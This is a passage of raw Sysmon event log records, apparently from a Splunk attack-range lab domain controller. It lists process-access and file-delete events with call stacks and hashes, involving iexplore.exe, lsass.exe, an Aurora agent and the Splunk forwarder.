Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.691{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.688{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000041950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.933{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7993AA40B8E6EAC4F75E8AA83550FC2C,SHA256=865E9C7985288CA3E2EE513E8B38D8D4B336DB34E253187127FB37FF3B0BB0B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.917{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005692C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.917{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.917{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000041946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.917{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=496740780DA857CE8045775C3ED388D7,SHA256=71A43CDEBD0DC3190D6F01AB765412E35FD3F52E0DB43BB390EFFCBD3649176D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.917{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.901{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.901{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.901{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016524Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:12.300{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A3A45A659F84AC169024FBFEFFB6258,SHA256=580FAD74982E97B02607E5C32571158F429622B8F82FF4DEA968AAA900F93062,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.756{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.756{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eb73|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.756{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eade|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.756{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.756{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.755{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eb73|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.755{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eade|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.755{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.755{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.755{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eb73|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.755{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eade|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.754{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.754{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.754{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+140a0a|C:\Windows\System32\windows.storage.dll+13dd6c|C:\Windows\System32\windows.storage.dll+13db48|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.753{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet 